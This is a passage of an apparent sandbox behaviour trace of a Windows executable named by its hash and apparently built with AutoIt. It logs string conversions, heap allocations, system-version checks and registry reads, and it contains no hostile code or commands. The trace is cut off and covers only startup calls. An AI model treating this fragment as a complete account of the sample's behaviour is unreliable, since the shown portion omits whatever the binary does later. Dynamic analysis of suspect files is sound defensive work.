\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿf\x8aw\x9dÜþ\x7f", lpUsedDefaultChar=0x0) returned 256 [0117.087] GetLastError () returned 0x0 [0117.087] SetLastError (dwErrCode=0x0) [0117.087] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x7ffda0, cbMultiByte=256, lpWideCharStr=0x7ff6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôĀ") returned 256 [0117.088] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0117.088] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿôĀ", cchSrc=256, lpDestStr=0x7ff4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0117.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x7ffba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿf\x8aw\x9dÜþ\x7f", lpUsedDefaultChar=0x0) returned 256 [0117.088] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.088] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf54acc) returned 0x0 [0117.099] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.109] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.109] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x3c) returned 0x12cba48 [0117.110] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12cd288 [0117.110] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12cd7c8 [0117.110] GetVersionExW (in: lpVersionInformation=0x7ffdb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x660065, dwMinorVersion=0x340064, dwBuildNumber=0x310031, dwPlatformId=0x660062, szCSDVersion="4f53116ca0fb0e0.exe") | out: lpVersionInformation=0x7ffdb8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0117.110] GetCurrentProcess () returned 0xffffffff [0117.110] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x7fff08 | out: Wow64Process=0x7fff08*=1) returned 1 [0117.110] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74650000 [0117.111] GetProcAddress (hModule=0x74650000, lpProcName="GetNativeSystemInfo") returned 0x7466ac70 [0117.111] GetNativeSystemInfo (in: lpSystemInfo=0x7ffed4 | out: lpSystemInfo=0x7ffed4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0117.112] FreeLibrary (hLibModule=0x74650000) returned 1 [0117.112] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.112] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x12cd3a8 [0117.113] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12cd330 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ca320 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca378 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c0598 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca3d8 [0117.113] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c42c8 [0117.114] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca540 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c1c08 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca420 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c2360 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca570 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c3e68 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca720 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c74e0 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12ca678 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c7650 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c9850 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c1bd0 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c96b8 [0117.114] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12c1be0 [0117.115] MapVirtualKeyW (uCode=0x5b, uMapType=0x0) returned 0x5b [0117.116] MapVirtualKeyW (uCode=0x10, uMapType=0x0) returned 0x2a [0117.116] MapVirtualKeyW (uCode=0xa0, uMapType=0x0) returned 0x2a [0117.116] MapVirtualKeyW (uCode=0xa1, uMapType=0x0) returned 0x36 [0117.116] MapVirtualKeyW (uCode=0x11, uMapType=0x0) returned 0x1d [0117.116] MapVirtualKeyW (uCode=0x12, uMapType=0x0) returned 0x38 [0117.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c9760 [0117.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12cab80 [0117.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c9718 [0117.116] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12cab90 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c9778 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76c0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12c96d0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7770 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7ab0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7720 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7ae0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7730 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a20 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7670 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7ac8 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7790 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b58 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7740 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a50 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77b0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7830 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d79c0 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7780 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a98 [0117.117] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7680 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a38 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77c0 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7978 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77d0 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a80 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7660 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7750 [0117.118] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1dc [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a68 [0117.118] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76d0 [0117.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x12cb730 [0117.119] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.119] OleInitialize (pvReserved=0x0) returned 0x0 [0117.151] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7af8 [0117.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77e0 [0117.152] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Mouse", ulOptions=0x0, samDesired=0x1, phkResult=0x7ffedc | out: phkResult=0x7ffedc*=0x1dc) returned 0x0 [0117.152] RegQueryValueExW (in: hKey=0x1dc, lpValueName="SwapMouseButtons", lpReserved=0x0, lpType=0x0, lpData=0x7ffef8, lpcbData=0x7ffee0*=0x8 | out: lpType=0x0, lpData=0x7ffef8*=0x30, lpcbData=0x7ffee0*=0x4) returned 0x0 [0117.152] RegCloseKey (hKey=0x1dc) returned 0x0 [0117.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12c99d8 [0117.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76e0 [0117.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77a0 [0117.153] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d77f0 [0117.154] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b28 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7800 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12c7760 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7810 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d79f0 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7820 [0117.154] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7888 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7690 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7960 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76a0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b10 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76b0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b40 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d76f0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7870 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7700 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d78a0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12d7710 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d78b8 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba60 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7990 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbab0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d78d0 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba40 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7a08 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb30 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d78e8 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbb40 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7930 [0117.155] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba00 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7900 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbae0 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7918 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db960 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7948 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9e0 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d79a8 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba90 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7ba0 [0117.156] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbaf0 [0117.156] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.156] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b70 [0117.160] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dba10 [0117.162] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7dfeb0, nSize=0x7fff | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0x62 [0117.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12c84a0 [0117.163] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12dbaa0 [0117.167] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7cfea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0117.167] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7b70 | out: hHeap=0x12c0000) returned 1 [0117.167] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x12cc5f0 [0117.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12c84a0 | out: hHeap=0x12c0000) returned 1 [0117.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12dbaa0 | out: hHeap=0x12c0000) returned 1 [0117.168] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7dfebc, lpFilePart=0x7efebc | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x7efebc*="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe") returned 0x62 [0117.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12cc6c8 [0117.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7b88 [0117.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7c18 [0117.168] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9d0 [0117.168] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AutoIt v3\\AutoIt", ulOptions=0x0, samDesired=0x1, phkResult=0x7efed8 | out: phkResult=0x7efed8*=0x0) returned 0x2 [0117.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7c18 | out: hHeap=0x12c0000) returned 1 [0117.168] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12db9d0 | out: hHeap=0x12c0000) returned 1 [0117.168] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.169] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.169] RtlSizeHeap (HeapHandle=0x12c0000, Flags=0x0, MemoryPointer=0x12c9a50) returned 0x80 [0117.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x12d7bb8 [0117.170] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12db9c0 [0117.170] RtlSizeHeap 